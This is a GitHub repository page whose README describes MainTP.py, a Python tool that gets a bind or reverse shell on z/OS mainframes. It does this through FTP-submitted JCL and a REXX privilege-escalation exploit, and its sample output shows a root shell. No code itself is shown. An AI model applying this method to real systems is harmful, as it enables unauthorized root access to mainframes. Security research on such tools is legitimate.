Skip to content
Mainframe Transfer: PROTOCOL
Branch: master
Clone or download
Latest commit 9309383 Nov 29, 2014
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
MainTP.py Update MainTP.py Jul 9, 2014
README.md Wrong CVE Mar 2, 2014

README.md

MainTP.py

A python script which takes a hostname/ip address of a z/OS FTP server, a username and password and gives you either a bind shell or reverse shell and automatically connects to it.

How?

Bind/Reverse Shell: A JCL file is dynamically generated which contains either a bind or reverse shell in C. This C code is compiled, on z/OS, at the time of exploit.

CVE-2012-5951: The JCL file contains an implementation of CVE-2012-5955 originally discovered by whomever perpetrated the Logica mainframe breach. Refer to https://github.com/mainframed/logica/blob/master/kuku.rx for original local priv escalation exploit on OMVS. This is essentially a REXX script that exploits a flaw to give you UID 0.

JCL: A JCL file is dynamically created based on the criteria provided (shell type, ip addresses, ports), uploaded via FTP and executed by JES (using the SITE FILE=JES extended commands).

NetEBCDICat: A copy of NetEBCDICat is here as well. NetEBCDICat is just an implementation, in python, of a socket ommunicator but it translates EBCDIC to ASCII because OMVS only speaks EBCDIC (ugh!).

Together

[+] Connecting to: mainframe.company.com : 21

[+] Switching to JES mode

[+] Inserting JCL in to job queue

[+] Job JOB00000 added to JES queue

[+] Connecting Reverse Shell - Waiting for z/OS!

id

uid=0(SYSROOT) gid=0(SYS1)

You can’t perform that action at this time.